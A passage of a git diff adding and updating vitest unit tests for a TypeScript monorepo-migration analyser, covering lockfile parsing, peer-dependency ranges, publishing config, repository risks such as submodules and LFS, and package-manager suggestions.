'empty-lock'); expect(result).toBeNull(); }); + + it('should emit parse warning callback on invalid lockfile', async () => { + await fs.writeFile(path.join(testDir, 'pnpm-lock.yaml'), '['); + const warnings: string[] = []; + const result = await parseLockfile(testDir, 'warn-lock', { + onParseWarning: (message) => warnings.push(message), + }); + + expect(result).toBeNull(); + expect(warnings.length).toBeGreaterThan(0); + expect(warnings[0]).toContain('warn-lock'); + }); }); diff --git a/tests/unit/analyzers/peers.test.ts b/tests/unit/analyzers/peers.test.ts index e2d9376..5611db0 100755 --- a/tests/unit/analyzers/peers.test.ts +++ b/tests/unit/analyzers/peers.test.ts @@ -46,14 +46,22 @@ describe('satisfiesRange', () => { expect(satisfiesRange('0.9.9', '>=1.0.0')).toBe(false); }); - it('should return false for complex ranges', () => { - expect(satisfiesRange('1.0.0', '^1.0.0 || ^2.0.0')).toBe(false); - expect(satisfiesRange('1.5.0', '1.0.0 - 2.0.0')).toBe(false); + it('should handle complex ranges correctly', () => { + expect(satisfiesRange('1.0.0', '^1.0.0 || ^2.0.0')).toBe(true); + expect(satisfiesRange('2.5.0', '^1.0.0 || ^2.0.0')).toBe(true); + expect(satisfiesRange('3.0.0', '^1.0.0 || ^2.0.0')).toBe(false); + expect(satisfiesRange('1.5.0', '1.0.0 - 2.0.0')).toBe(true); + expect(satisfiesRange('0.9.0', '1.0.0 - 2.0.0')).toBe(false); }); it('should handle non-parseable versions', () => { expect(satisfiesRange('not-a-version', '^1.0.0')).toBe(false); }); + + it('should return false for invalid range syntax', () => { + // Triggers the catch block when semver.satisfies throws + expect(satisfiesRange('1.0.0', 'completely invalid range !@#$%')).toBe(false); + }); }); describe('analyzePeerDependencies', () => { @@ -102,11 +110,11 @@ describe('analyzePeerDependencies', () => { const result = analyzePeerDependencies(packages, lockResolutions); expect(result).toHaveLength(1); expect(result[0].name).toBe('react'); - expect(result[0].confidence).toBe('medium'); + expect(result[0].confidence).toBe('high'); expect(result[0].conflictSource).toBe('peer-constraint'); }); - it('should use low confidence for complex ranges', () => { + it('should correctly evaluate complex ranges and emit conflict when unsatisfied', () => { const packages = [ createMockPackage('plugin', {}, {}, { react: '^16.0.0 || ^17.0.0' }), createMockPackage('app', { react: '^18.2.0' }), @@ -121,8 +129,28 @@ describe('analyzePeerDependencies', () => { ]; const result = analyzePeerDependencies(packages, lockResolutions); + // 18.2.0 does NOT satisfy ^16.0.0 || ^17.0.0, so a conflict is emitted expect(result).toHaveLength(1); - expect(result[0].confidence).toBe('low'); + expect(result[0].confidence).toBe('high'); + }); + + it('should not emit conflict when complex range IS satisfied', () => { + const packages = [ + createMockPackage('plugin', {}, {}, { react: '^17.0.0 || ^18.0.0' }), + createMockPackage('app', { react: '^18.2.0' }), + ]; + + const lockResolutions: LockfileResolution[] = [ + { + packageManager: 'npm', + repoName: 'app', + resolvedVersions: { react: '18.2.0' }, + }, + ]; + + const result = analyzePeerDependencies(packages, lockResolutions); + // 18.2.0 DOES satisfy ^17.0.0 || ^18.0.0 + expect(result).toHaveLength(0); }); it('should skip peer deps with no available version', () => { @@ -134,6 +162,26 @@ describe('analyzePeerDependencies', () => { expect(result).toEqual([]); }); + it('should use lockfile resolution from the same repo as peer dep', () => { + // The peer dep is in 'my-plugin', and the lockfile resolution is also for 'my-plugin' + const packages = [ + createMockPackage('my-plugin', {}, {}, { react: '^18.0.0' }), + createMockPackage('my-app', { react: '^18.2.0' }), + ]; + + const lockResolutions: LockfileResolution[] = [ + { + packageManager: 'npm', + repoName: 'my-plugin', + resolvedVersions: { react: '18.2.0' }, + }, + ]; + + const result = analyzePeerDependencies(packages, lockResolutions); + // 18.2.0 satisfies ^18.0.0, so no conflict + expect(result).toHaveLength(0); + }); + it('should use declared versions when no lockfile resolution exists', () => { const packages = [ createMockPackage('my-plugin', {}, {}, { react: '^17.0.0' }), diff --git a/tests/unit/analyzers/prepare.test.ts b/tests/unit/analyzers/prepare.test.ts new file mode 100644 index 0000000..8cccb6e --- /dev/null +++ b/tests/unit/analyzers/prepare.test.ts @@ -0,0 +1,117 @@ +import { describe, it, expect, afterEach } from 'vitest'; +import { + analyzeRepoForPreparation, + analyzeReposForPreparation, +} from '../../../src/analyzers/prepare.js'; +import { createTempFixture, cleanupFixtures } from '../../helpers/fixtures.js'; + +describe('analyzeRepoForPreparation', () => { + afterEach(async () => { + await cleanupFixtures(); + }); + + it('should detect .nvmrc and .node-version files', async () => { + const repoPath = await createTempFixture({ + name: 'repo-with-version-files', + packageJson: { name: 'test', version: '1.0.0' }, + files: { + '.nvmrc': '20', + '.node-version': '20.11.0', + }, + }); + + const result = await analyzeRepoForPreparation(repoPath, 'test-repo'); + expect(result.nvmrc).toBe('20'); + expect(result.nodeVersion).toBe('20.11.0'); + }); + + it('should return null for missing .nvmrc and .node-version', async () => { + const repoPath = await createTempFixture({ + name: 'repo-no-version-files', + packageJson: { name: 'test', version: '1.0.0' }, + }); + + const result = await analyzeRepoForPreparation(repoPath, 'test-repo'); + expect(result.nvmrc).toBeNull(); + expect(result.nodeVersion).toBeNull(); + }); + + it('should extract engines.node from package.json', async () => { + const repoPath = await createTempFixture({ + name: 'repo-engines', + packageJson: { name: 'test', version: '1.0.0', engines: { node: '>=18' } }, + }); + + const result = await analyzeRepoForPreparation(repoPath, 'test-repo'); + expect(result.enginesNode).toBe('>=18'); + }); + + it('should detect build scripts', async () => { + const repoPath = await createTempFixture({ + name: 'repo-build', + packageJson: { + name: 'test', + version: '1.0.0', + scripts: { build: 'tsc', test: 'vitest' }, + }, + }); + + const result = await analyzeRepoForPreparation(repoPath, 'test-repo'); + expect(result.hasBuildScript).toBe(true); + expect(result.existingBuildScript).toBe('tsc'); + }); + + it('should detect packageManager field', async () => { + const repoPath = await createTempFixture({ + name: 'repo-pm', + packageJson: { + name: 'test', + version: '1.0.0', + packageManager: 'pnpm@9.0.0', + }, + }); + + const result = await analyzeRepoForPreparation(repoPath, 'test-repo'); + expect(result.existingPackageManagerField).toBe('pnpm@9.0.0'); + }); + + it('should handle missing package.json', async () => { + const repoPath = await createTempFixture({ + name: 'repo-no-pkg', + files: { 'README.md': '# Hello' }, + }); + + const result = await analyzeRepoForPreparation(repoPath, 'test-repo'); + expect(result.enginesNode).toBeNull(); + expect(result.hasBuildScript).toBe(false); + expect(result.existingPackageManagerField).toBeNull(); + }); +}); + +describe('analyzeReposForPreparation', () => { + afterEach(async () => { + await cleanupFixtures(); + }); + + it('should analyze multiple repos and generate patches/checklist', async () => { + const repo1 = await createTempFixture({ + name: 'prep-repo-1', + packageJson: { name: 'app-a', version: '1.0.0' }, + files: { '.nvmrc': '18' }, + }); + const repo2 = await createTempFixture({ + name: 'prep-repo-2', + packageJson: { name: 'app-b', version: '1.0.0' }, + files: { '.nvmrc': '20' }, + }); + + const result = await analyzeReposForPreparation([ + { path: repo1, name: 'prep-repo-1' }, + { path: repo2, name: 'prep-repo-2' }, + ]); + + expect(result.repos).toHaveLength(2); + expect(Array.isArray(result.checklist)).toBe(true); + expect(Array.isArray(result.patches)).toBe(true); + }); +}); diff --git a/tests/unit/analyzers/publishing.test.ts b/tests/unit/analyzers/publishing.test.ts new file mode 100755 index 0000000..1454d5d --- /dev/null +++ b/tests/unit/analyzers/publishing.test.ts @@ -0,0 +1,160 @@ +import { describe, it, expect, afterEach } from 'vitest'; +import { analyzePublishing } from '../../../src/analyzers/publishing.js'; +import { createTempFixture, cleanupFixtures } from '../../helpers/fixtures.js'; +import { createMockLogger } from '../../helpers/mocks.js'; + +describe('analyzePublishing', () => { + const logger = createMockLogger(); + + afterEach(async () => { + await cleanupFixtures(); + }); + + it('should detect publishable packages without publishConfig', async () => { + const repoPath = await createTempFixture({ + name: 'publishable-repo', + packageJson: { name: 'my-lib', version: '1.0.0' }, + }); + + const findings = await analyzePublishing( + [{ path: repoPath, name: 'publishable-repo' }], + logger, + ); + + const noConfig = findings.find((f) => f.id.startsWith('publishing-no-config')); + expect(noConfig).toBeDefined(); + }); + + it('should detect custom registries', async () => { + const repoPath = await createTempFixture({ + name: 'custom-reg-repo', + packageJson: { + name: 'internal-lib', + version: '1.0.0', + publishConfig: { registry: 'https://npm.internal.company.com/' }, + }, + }); + + const findings = await analyzePublishing( + [{ path: repoPath, name: 'custom-reg-repo' }], + logger, + ); + + const customReg = findings.find((f) => f.id.startsWith('publishing-custom-registry')); + expect(customReg).toBeDefined(); + }); + + it('should detect multiple registries', async () => { + const repo1 = await createTempFixture({ + name: 'registry-repo-1', + packageJson: { + name: 'lib-a', + version: '1.0.0', + publishConfig: { registry: 'https://npm.company-a.com/' }, + }, + }); + const repo2 = await createTempFixture({ + name: 'registry-repo-2', + packageJson: { + name: 'lib-b', + version: '1.0.0', + publishConfig: { registry: 'https://npm.company-b.com/' }, + }, + }); + + const findings = await analyzePublishing( + [ + { path: repo1, name: 'registry-repo-1' }, + { path: repo2, name: 'registry-repo-2' }, + ], + logger, + ); + + const multiReg = findings.find((f) => f.id === 'publishing-multiple-registries'); + expect(multiReg).toBeDefined(); + expect(multiReg!.severity).toBe('warn'); + }); + + it('should handle malformed package.json gracefully', async () => { + const repoPath = await createTempFixture({ + name: 'malformed-pub-repo', + files: { + 'package.json': '{ invalid json !!!', + }, + }); + + const findings = await analyzePublishing( + [{ path: repoPath, name: 'malformed-pub-repo' }], + logger, + ); + + const malformed = findings.find( + (f) => f.id === 'publishing-malformed-package-json-malformed-pub-repo' + ); + expect(malformed).toBeDefined(); + expect(malformed?.severity).toBe('warn'); + }); + + it('should detect packages without main/exports', async () => { + const repoPath = await createTempFixture({ + name: 'no-entry-repo', + packageJson: { name: 'no-entry-lib', version: '1.0.0' }, + }); + + const findings = await analyzePublishing( + [{ path: repoPath, name: 'no-entry-repo' }], + logger, + ); + + const noEntry = findings.find((f) => f.id.startsWith('publishing-no-entry')); + expect(noEntry).toBeDefined(); + }); + + it('should detect packages without files field', async () => { + const repoPath = await createTempFixture({ + name: 'no-files-repo', + packageJson: { name: 'no-files-lib', version: '1.0.0', main: 'index.js' }, + }); + + const findings = await analyzePublishing( + [{ path: repoPath, name: 'no-files-repo' }], + logger, + ); + + const noFiles = findings.find((f) => f.id.startsWith('publishing-no-files')); + expect(noFiles).toBeDefined(); + }); + + it('should not flag custom registry for npmjs.org', async () => { + const repoPath = await createTempFixture({ + name: 'npmjs-repo', + packageJson: { + name: 'lib', + version: '1.0.0', + publishConfig: { registry: 'https://registry.npmjs.org/' }, + }, + }); + + const findings = await analyzePublishing( + [{ path: repoPath, name: 'npmjs-repo' }], + logger, + ); + + const customReg = findings.find((f) => f.id.startsWith('publishing-custom-registry')); + expect(customReg).toBeUndefined(); + }); + + it('should not flag private packages', async () => { + const repoPath = await createTempFixture({ + name: 'private-repo', + packageJson: { name: 'private-app', version: '1.0.0', private: true }, + }); + + const findings = await analyzePublishing( + [{ path: repoPath, name: 'private-repo' }], + logger, + ); + + expect(findings.filter((f) => f.id.startsWith('publishing-no-config'))).toHaveLength(0); + }); +}); diff --git a/tests/unit/analyzers/repo-risks.test.ts b/tests/unit/analyzers/repo-risks.test.ts new file mode 100755 index 0000000..929402f --- /dev/null +++ b/tests/unit/analyzers/repo-risks.test.ts @@ -0,0 +1,208 @@ +import { describe, it, expect, afterEach } from 'vitest'; +import { analyzeRepoRisks } from '../../../src/analyzers/repo-risks.js'; +import { createTempFixture, cleanupFixtures } from '../../helpers/fixtures.js'; +import { createMockLogger } from '../../helpers/mocks.js'; + +describe('analyzeRepoRisks', () => { + const logger = createMockLogger(); + + afterEach(async () => { + await cleanupFixtures(); + }); + + it('should detect git submodules', async () => { + const repoPath = await createTempFixture({ + name: 'repo-submodule', + packageJson: { name: 'test', version: '1.0.0' }, + files: { + '.gitmodules': '[submodule "vendor/lib"]\n\tpath = vendor/lib\n\turl = https://github.com/org/lib.git', + }, + }); + + const findings = await analyzeRepoRisks( + [{ path: repoPath, name: 'repo-submodule' }], + logger, + ); + + const submodule = findings.find((f) => f.id.startsWith('risk-submodules')); + expect(submodule).toBeDefined(); + expect(submodule!.severity).toBe('error'); + }); + + it('should detect Git LFS', async () => { + const repoPath = await createTempFixture({ + name: 'repo-lfs', + packageJson: { name: 'test', version: '1.0.0' }, + files: { + '.gitattributes': '*.psd filter=lfs diff=lfs merge=lfs -text\n*.zip filter=lfs diff=lfs merge=lfs -text', + }, + }); + + const findings = await analyzeRepoRisks( + [{ path: repoPath, name: 'repo-lfs' }], + logger, + ); + + const lfs = findings.find((f) => f.id.startsWith('risk-lfs')); + expect(lfs).toBeDefined(); + expect(lfs!.severity).toBe('warn'); + expect(lfs!.evidence.length).toBe(2); // Two LFS patterns + }); + + it('should return empty findings for clean repo', async () => { + const repoPath = await createTempFixture({ + name: 'clean-repo', + packageJson: { name: 'test', version: '1.0.0' }, + }); + + const findings = await analyzeRepoRisks( + [{ path: repoPath, name: 'clean-repo' }], + logger, + ); + + // Should have no submodule/LFS findings (may have large file findings) + expect(findings.filter((f) => f.id.startsWith('risk-submodules'))).toHaveLength(0); + expect(findings.filter((f) => f.id.startsWith('risk-lfs'))).toHaveLength(0); + }); + + it('should count multiple submodules correctly', async () => { + const repoPath = await createTempFixture({ + name: 'repo-multi-sub', + packageJson: { name: 'test', version: '1.0.0' }, + files: { + '.gitmodules': + '[submodule "a"]\n\tpath = a\n\turl = u\n[submodule "b"]\n\tpath = b\n\turl = u2\n', + }, + }); + + const findings = await analyzeRepoRisks( + [{ path: repoPath, name: 'repo-multi-sub' }], + logger, + ); + const sub = findings.find((f) => f.id === 'risk-submodules-repo-multi-sub'); + expect(sub).toBeDefined(); + expect(sub!.evidence[0].snippet).toContain('2 submodule'); + }); + + it('should not flag .gitattributes without LFS filters', async () => { + const repoPath = await createTempFixture({ + name: 'repo-no-lfs', + packageJson: { name: 'test', version: '1.0.0' }, + files: { + '.gitattributes': '*.md text=auto\n*.sh text eol=lf\n', + }, + }); + + const findings = await analyzeRepoRisks( + [{ path: repoPath, name: 'repo-no-lfs' }], + logger, + ); + expect(findings.filter((f) => f.id.startsWith('risk-lfs'))).toHaveLength(0); + }); + + it('should detect large files above 1MB threshold', async () => { + const repoPath = await createTempFixture({ + name: 'repo-large', + packageJson: { name: 'test', version: '1.0.0' }, + files: { + 'small.txt': 'hello world', + }, + }); + // Write a large file directly (>1MB) + const fs = await import('fs-extra'); + const path = await import('node:path'); + await fs.writeFile(path.join(repoPath, 'big-bundle.js'), Buffer.alloc(1_100_000, 'x')); + + const findings = await analyzeRepoRisks( + [{ path: repoPath, name: 'repo-large' }], + logger, + ); + const large = findings.filter((f) => f.id.startsWith('risk-large-file')); + expect(large.length).toBeGreaterThanOrEqual(1); + expect(large[0].severity).toBe('warn'); + expect(large[0].title).toContain('big-bundle.js'); + }); + + it('should detect case collisions across repos', async () => { + const repoAPath = await createTempFixture({ + name: 'repo-case-a', + packageJson: { name: 'a', version: '1.0.0' }, + files: { 'Utils.ts': 'export const a = 1;' }, + }); + const repoBPath = await createTempFixture({ + name: 'repo-case-b', + packageJson: { name: 'b', version: '1.0.0' }, + files: { 'utils.ts': 'export const b = 1;' }, + }); + + const findings = await analyzeRepoRisks( + [ + { path: repoAPath, name: 'repo-case-a' }, + { path: repoBPath, name: 'repo-case-b' }, + ], + logger, + ); + const collisions = findings.filter((f) => f.id.startsWith('risk-case-collision')); + expect(collisions).toHaveLength(1); + expect(collisions[0].severity).toBe('error'); + }); + + it('should not flag identical file names as case collisions', async () => { + const repoAPath = await createTempFixture({ + name: 'repo-same-a', + packageJson: { name: 'a', version: '1.0.0' }, + files: { 'README.md': 'A' }, + }); + const repoBPath = await createTempFixture({ + name: 'repo-same-b', + packageJson: { name: 'b', version: '1.0.0' }, + files: { 'README.md': 'B' }, + }); + + const findings = await analyzeRepoRisks( + [ + { path: repoAPath, name: 'repo-same-a' }, + { path: repoBPath, name: 'repo-same-b' }, + ], + logger, + ); + const collisions = findings.filter((f) => f.id.startsWith('risk-case-collision')); + expect(collisions).toHaveLength(0); + }); + + it('should handle non-existent repo path gracefully', async () => { + const findings = await analyzeRepoRisks( + [{ path: '/nonexistent/repo/path', name: 'ghost-repo' }], + logger, + ); + // Should not throw, just skip the failed repo + expect(Array.isArray(findings)).toBe(true); + }); + + it('should handle mixed findings across multiple repos', async () => { + const repoAPath = await createTempFixture({ + name: 'repo-mixed-a', + packageJson: { name: 'a', version: '1.0.0' }, + files: { + '.gitmodules': '[submodule "lib"]\n\tpath = lib\n\turl = u\n', + }, + }); + const repoBPath = await createTempFixture({ + name: 'repo-mixed-b', + packageJson: { name: 'b', version: '1.0.0' }, + files: { + '.gitattributes': '*.bin filter=lfs diff=lfs merge=lfs -text\n', + }, + }); + + const findings = await analyzeRepoRisks( + [ + { path: repoAPath, name: 'repo-mixed-a' }, + { path: repoBPath, name: 'repo-mixed-b' }, + ], + logger, + ); + expect(findings.some((f) => f.id === 'risk-submodules-repo-mixed-a')).toBe(true); + expect(findings.some((f) => f.id === 'risk-lfs-repo-mixed-b')).toBe(true); + }); +}); diff --git a/tests/unit/analyzers/risk-summary.test.ts b/tests/unit/analyzers/risk-summary.test.ts new file mode 100644 index 0000000..e9f077c --- /dev/null +++ b/tests/unit/analyzers/risk-summary.test.ts @@ -0,0 +1,164 @@ +import { describe, it, expect } from 'vitest'; +import { classifyRisk } from '../../../src/analyzers/risk-summary.js'; +import type { AnalysisFinding } from '../../../src/types/index.js'; + +function makeFinding(overrides: Partial = {}): AnalysisFinding { + return { + id: 'test-finding', + title: 'Test finding', + severity: 'info', + confidence: 'high', + evidence: [], + suggestedAction: 'Test action', + ...overrides, + }; +} + +describe('classifyRisk', () => { + it('should return straightforward when no findings', () => { + const result = classifyRisk([]); + expect(result.classification).toBe('straightforward'); + expect(result.reasons).toContain('No significant risks detected'); + expect(result.topFindings).toEqual([]); + }); + + it('should return straightforward for info-only findings', () => { + const result = classifyRisk([ + makeFinding({ id: 'a', severity: 'info' }), + makeFinding({ id: 'b', severity: 'info' }), + ]); + expect(result.classification).toBe('straightforward'); + expect(result.reasons).toContain('No significant risks detected'); + }); + + it('should classify as complex when critical findings exist', () => { + const result = classifyRisk([ + makeFinding({ id: 'crit-1', severity: 'critical' }), + ]); + expect(result.classification).toBe('complex'); + expect(result.reasons.some((r) => r.includes('1 critical issue'))).toBe(true); + }); + + it('should classify as needs-decisions when error findings exist', () => { + const result = classifyRisk([ + makeFinding({ id: 'err-1', severity: 'error' }), + ]); + expect(result.classification).toBe('needs-decisions'); + expect(result.reasons.some((r) => r.includes('1 error-level finding'))).toBe(true); + }); + + it('should stay complex when both critical and error findings exist', () => { + const result = classifyRisk([ + makeFinding({ id: 'crit-1', severity: 'critical' }), + makeFinding({ id: 'err-1', severity: 'error' }), + ]); + expect(result.classification).toBe('complex'); + expect(result.reasons).toHaveLength(2); + }); + + it('should classify as needs-decisions when more than 3 warnings', () => { + const result = classifyRisk([ + makeFinding({ id: 'w1', severity: 'warn' }), + makeFinding({ id: 'w2', severity: 'warn' }), + makeFinding({ id: 'w3', severity: 'warn' }), + makeFinding({ id: 'w4', severity: 'warn' }), + ]); + expect(result.classification).toBe('needs-decisions'); + expect(result.reasons.some((r) => r.includes('4 warnings'))).toBe(true); + }); + + it('should stay straightforward with 3 or fewer warnings', () => { + const result = classifyRisk([ + makeFinding({ id: 'w1', severity: 'warn' }), + makeFinding({ id: 'w2', severity: 'warn' }), + makeFinding({ id: 'w3', severity: 'warn' }), + ]); + expect(result.classification).toBe('straightforward'); + }); + + it('should classify as complex when submodules are detected', () => { + const result = classifyRisk([ + makeFinding({ id: 'risk-submodules-repo-a', severity: 'error' }), + ]); + expect(result.classification).toBe('complex'); + expect(result.reasons.some((r) => r.includes('submodules'))).toBe(true); + }); + + it('should classify as needs-decisions when LFS is detected', () => { + const result = classifyRisk([ + makeFinding({ id: 'risk-lfs-repo-a', severity: 'warn' }), + ]); + expect(result.classification).toBe('needs-decisions'); + expect(result.reasons.some((r) => r.includes('LFS'))).toBe(true); + }); + + it('should classify as needs-decisions when multiple CI systems detected', () => { + const result = classifyRisk([ + makeFinding({ id: 'ci-multiple-systems', severity: 'warn' }), + ]); + expect(result.classification).toBe('needs-decisions'); + expect(result.reasons.some((r) => r.includes('CI system'))).toBe(true); + }); + + it('should note node mismatch without upgrading classification', () => { + const result = classifyRisk([ + makeFinding({ id: 'env-node-mismatch', severity: 'warn' }), + ]); + // Only 1 warning, so classification stays straightforward + expect(result.classification).toBe('straightforward'); + expect(result.reasons.some((r) => r.includes('Node.js'))).toBe(true); + }); + + it('should classify as complex when case collisions detected', () => { + const result = classifyRisk([ + makeFinding({ id: 'risk-case-collision-readme', severity: 'error' }), + ]); + expect(result.classification).toBe('complex'); + expect(result.reasons.some((r) => r.includes('case collision'))).toBe(true); + }); + + it('should return top 5 findings sorted by severity', () => { + const findings = [ + makeFinding({ id: 'info-1', severity: 'info' }), + makeFinding({ id: 'warn-1', severity: 'warn' }), + makeFinding({ id: 'crit-1', severity: 'critical' }), + makeFinding({ id: 'err-1', severity: 'error' }), + makeFinding({ id: 'err-2', severity: 'error' }), + makeFinding({ id: 'info-2', severity: 'info' }), + makeFinding({ id: 'warn-2', severity: 'warn' }), + ]; + + const result = classifyRisk(findings); + expect(result.topFindings).toHaveLength(5); + expect(result.topFindings[0].id).toBe('crit-1'); + expect(result.topFindings[1].severity).toBe('error'); + expect(result.topFindings[2].severity).toBe('error'); + }); + + it('should return all findings as topFindings when fewer than 5', () => { + const findings = [ + makeFinding({ id: 'a', severity: 'warn' }), + makeFinding({ id: 'b', severity: 'error' }), + ]; + + const result = classifyRisk(findings); + expect(result.topFindings).toHaveLength(2); + expect(result.topFindings[0].id).toBe('b'); // error first + expect(result.topFindings[1].id).toBe('a'); // warn second + }); + + it('should accumulate multiple reasons from different risk patterns', () => { + const findings = [ + makeFinding({ id: 'risk-submodules-repo', severity: 'error' }), + makeFinding({ id: 'risk-lfs-repo', severity: 'warn' }), + makeFinding({ id: 'ci-multiple-systems', severity: 'warn' }), + makeFinding({ id: 'env-node-mismatch', severity: 'warn' }), + makeFinding({ id: 'risk-case-collision-x', severity: 'error' }), + ]; + + const result = classifyRisk(findings); + expect(result.classification).toBe('complex'); + // Should have reasons for: errors, submodules, LFS, multiple CI, node mismatch, case collision + expect(result.reasons.length).toBeGreaterThanOrEqual(5); + }); +}); diff --git a/tests/unit/analyzers/suggestions.test.ts b/tests/unit/analyzers/suggestions.test.ts new file mode 100755 index 0000000..8ac8640 --- /dev/null +++ b/tests/unit/analyzers/suggestions.test.ts @@ -0,0 +1,440 @@ +import { describe, it, expect, afterEach } from 'vitest'; +import { + suggestPackageManager, + suggestWorkspaceTool, + suggestDependencyStrategy, +} from '../../../src/analyzers/suggestions.js'; +import { createTempFixture, cleanupFixtures } from '../../helpers/fixtures.js'; +import type { DependencyConflict } from '../../../src/types/index.js'; + +afterEach(async () => { + await cleanupFixtures(); +}); + +describe('suggestPackageManager', () => { + it('should suggest pnpm when repos have pnpm-lock.yaml', async () => { + const repoA = await createTempFixture({ + name: 'repo-a', + packageJson: { name: 'repo-a', version: '1.0.0' }, + files: { 'pnpm-lock.yaml': 'lockfileVersion: 6\n' }, + }); + const repoB = await createTempFixture({ + name: 'repo-b', + packageJson: { name: 'repo-b', version: '1.0.0' }, + files: { 'pnpm-lock.yaml': 'lockfileVersion: 6\n' }, + }); + + const result = await suggestPackageManager([ + { path: repoA, name: 'repo-a' }, + { path: repoB, name: 'repo-b' }, + ]); + + expect(result.suggestion).toBe('pnpm'); + expect(result.confidence).toBe('high'); + expect(result.evidence).toContain('repo-a has pnpm-lock.yaml'); + expect(result.evidence).toContain('repo-b has pnpm-lock.yaml'); + expect(result.topic).toBe('package-manager'); + }); + + it('should suggest yarn when repos have yarn.lock', async () => { + const repoA = await createTempFixture({ + name: 'repo-a', + packageJson: { name: 'repo-a', version: '1.0.0' }, + files: { 'yarn.lock': '# yarn lockfile v1\n' }, + }); + const repoB = await createTempFixture({ + name: 'repo-b', + packageJson: { name: 'repo-b', version: '1.0.0' }, + files: { 'yarn.lock': '# yarn lockfile v1\n' }, + }); + + const result = await suggestPackageManager([ + { path: repoA, name: 'repo-a' }, + { path: repoB, name: 'repo-b' }, + ]); + + expect(result.suggestion).toBe('yarn'); + expect(result.confidence).toBe('high'); + }); + + it('should suggest npm when repos have package-lock.json', async () => { + const repoA = await createTempFixture({ + name: 'repo-a', + packageJson: { name: 'repo-a', version: '1.0.0' }, + files: { 'package-lock.json': '{}' }, + }); + + const result = await suggestPackageManager([ + { path: repoA, name: 'repo-a' }, + ]); + + expect(result.suggestion).toBe('npm'); + expect(result.confidence).toBe('high'); + }); + + it('should detect packageManager field in package.json', async () => { + const repoA = await createTempFixture({ + name: 'repo-a', + packageJson: { + name: 'repo-a', + version: '1.0.0', + packageManager: 'pnpm@8.15.0', + }, + }); + + const result = await suggestPackageManager([ + { path: repoA, name: 'repo-a' }, + ]); + + expect(result.suggestion).toBe('pnpm'); + expect(result.evidence.some((e) => e.includes('packageManager field'))).toBe(true); + }); + + it('should prefer pnpm when tied', async () => { + const repoA = await createTempFixture({ + name: 'repo-a', + packageJson: { name: 'repo-a', version: '1.0.0' }, + files: { 'pnpm-lock.yaml': '' }, + }); + const repoB = await createTempFixture({ + name: 'repo-b', + packageJson: { name: 'repo-b', version: '1.0.0' }, + files: { 'yarn.lock': '' }, + }); + + const result = await suggestPackageManager([ + { path: repoA, name: 'repo-a' }, + { path: repoB, name: 'repo-b' }, + ]); + + expect(result.suggestion).toBe('pnpm'); + expect(result.evidence).toContain('Tied between package managers, preferring pnpm'); + }); + + it('should default to pnpm with low confidence when no signals found', async () => { + const repoA = await createTempFixture({ + name: 'repo-a', + packageJson: { name: 'repo-a', version: '1.0.0' }, + }); + + const result = await suggestPackageManager([ + { path: repoA, name: 'repo-a' }, + ]); + + expect(result.suggestion).toBe('pnpm'); + expect(result.confidence).toBe('low'); + }); + + it('should use majority vote with mixed lockfiles', async () => { + const repoA = await createTempFixture({ + name: 'repo-a', + packageJson: { name: 'repo-a', version: '1.0.0' }, + files: { 'yarn.lock': '' }, + }); + const repoB = await createTempFixture({ + name: 'repo-b', + packageJson: { name: 'repo-b', version: '1.0.0' }, + files: { 'yarn.lock': '' }, + }); + const repoC = await createTempFixture({ + name: 'repo-c', + packageJson: { name: 'repo-c', version: '1.0.0' }, + files: { 'pnpm-lock.yaml': '' }, + }); + + const result = await suggestPackageManager([ + { path: repoA, name: 'repo-a' }, + { path: repoB, name: 'repo-b' }, + { path: repoC, name: 'repo-c' }, + ]); + + expect(result.suggestion).toBe('yarn'); + expect(result.confidence).toBe('medium'); + }); + + it('should include alternatives in the result', async () => { + const repoA = await createTempFixture({ + name: 'repo-a', + packageJson: { name: 'repo-a', version: '1.0.0' }, + files: { 'pnpm-lock.yaml': '' }, + }); + + const result = await suggestPackageManager([ + { path: repoA, name: 'repo-a' }, + ]); + + expect(result.alternatives).toContain('yarn'); + expect(result.alternatives).toContain('npm'); + expect(result.alternatives).not.toContain('pnpm'); + }); + + it('should include evidence when package.json is malformed', async () => { + const repoA = await createTempFixture({ + name: 'repo-malformed-suggestions', + files: { + 'package.json': '{ invalid json !!!', + }, + }); + + const result = await suggestPackageManager([ + { path: repoA, name: 'repo-malformed-suggestions' }, + ]); + + expect( + result.evidence.some((e) => e.includes('Could not parse package.json in repo-malformed-suggestions')) + ).toBe(true); + }); +}); + +describe('suggestWorkspaceTool', () => { + it('should suggest turbo when repos have turbo.json', async () => { + const repoA = await createTempFixture({ + name: 'repo-a', + packageJson: { name: 'repo-a', version: '1.0.0' }, + files: { 'turbo.json': '{}' }, + }); + const repoB = await createTempFixture({ + name: 'repo-b', + packageJson: { name: 'repo-b', version: '1.0.0' }, + files: { 'turbo.json': '{}' }, + }); + + const result = await suggestWorkspaceTool([ + { path: repoA, name: 'repo-a' }, + { path: repoB, name: 'repo-b' }, + ]); + + expect(result.suggestion).toBe('turbo'); + expect(result.confidence).toBe('high'); + expect(result.topic).toBe('workspace-tool'); + expect(result.evidence).toContain('repo-a has turbo.json'); + expect(result.evidence).toContain('repo-b has turbo.json'); + }); + + it('should suggest nx when repos have nx.json', async () => { + const repoA = await createTempFixture({ + name: 'repo-a', + packageJson: { name: 'repo-a', version: '1.0.0' }, + files: { 'nx.json': '{}' }, + }); + + const result = await suggestWorkspaceTool([ + { path: repoA, name: 'repo-a' }, + ]); + + expect(result.suggestion).toBe('nx'); + expect(result.confidence).toBe('high'); + }); + + it('should suggest none when no tool configs found', async () => { + const repoA = await createTempFixture({ + name: 'repo-a', + packageJson: { name: 'repo-a', version: '1.0.0' }, + }); + + const result = await suggestWorkspaceTool([ + { path: repoA, name: 'repo-a' }, + ]); + + expect(result.suggestion).toBe('none'); + expect(result.confidence).toBe('medium'); + expect(result.evidence).toContain('No workspace tool configs found in any repo'); + }); + + it('should handle mixed turbo and nx with low confidence', async () => { + const repoA = await createTempFixture({ + name: 'repo-a', + packageJson: { name: 'repo-a', version: '1.0.0' }, + files: { 'turbo.json': '{}' }, + }); + const repoB = await createTempFixture({ + name: 'repo-b', + packageJson: { name: 'repo-b', version: '1.0.0' }, + files: { 'nx.json': '{}' }, + }); + + const result = await suggestWorkspaceTool([ + { path: repoA, name: 'repo-a' }, + { path: repoB, name: 'repo-b' }, + ]); + + expect(result.confidence).toBe('low'); + expect(result.evidence).toContain('Both turbo and nx configs found across repos'); + }); + + it('should give medium confidence when only some repos have the tool', async () => { + const repoA = await createTempFixture({ + name: 'repo-a', + packageJson: { name: 'repo-a', version: '1.0.0' }, + files: { 'turbo.json': '{}' }, + }); + const repoB = await createTempFixture({ + name: 'repo-b', + packageJson: { name: 'repo-b', version: '1.0.0' }, + }); + + const result = await 